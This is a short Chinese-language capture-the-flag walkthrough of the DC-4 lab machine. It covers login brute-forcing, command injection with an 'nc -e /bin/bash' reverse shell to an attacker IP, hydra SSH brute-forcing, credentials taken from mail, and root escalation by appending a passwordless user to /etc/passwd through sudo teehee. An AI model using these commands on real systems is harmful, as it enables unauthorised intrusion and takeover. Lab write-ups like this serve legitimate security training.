dc4
扫描

目录扫描

指纹

渗透
该靶机首页即为登录框,此处别无下手,考虑注入或者爆破,注入经过尝试不行,此处选择爆破

使用bp抓包


此处我只猜测了admin和root两个用户
爆出用户信息为
admin:happy
输入信息过后居然没成功,再试一次登录成功

发现代码执行,感觉可以利用

抓包发现命令位置

使用nc进行远程连接此处修改为
nc+-e+/bin/bash+10.4.7.138+12138
成功连接

使用命令回显
python -c 'import pty;pty.spawn("/bin/bash")'

看一下可以登录的用户

发现jim和sam
进入家目录探查
jim目录下这些内容应该是有用的
将旧密码摘过来当字典用

使用hydra爆破
hydra -l jim -P pojie1.txt ssh://10.4.7.147 -V -f -t 50
得到账户信息

jim:jibril04
使用ssh连接登录

常规提权还不行,还得看看用户相关的
登录到jim时,有邮件提示

看到/var/mail下有一封邮件

得到用户信息
charles:^xHhA&hvim0y
提权
su切换至charles

此时再使用sudo -l就会发现可以使用teehee

利用heetee
echo "orderl::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

可以查看passwd文件确认一下
添加完成后su到该用户即为root用户

flag文件就在/root下
可以查看passwd文件确认一下
添加完成后su到该用户即为root用户
flag文件就在/root下

2029

被折叠的 条评论
为什么被折叠?



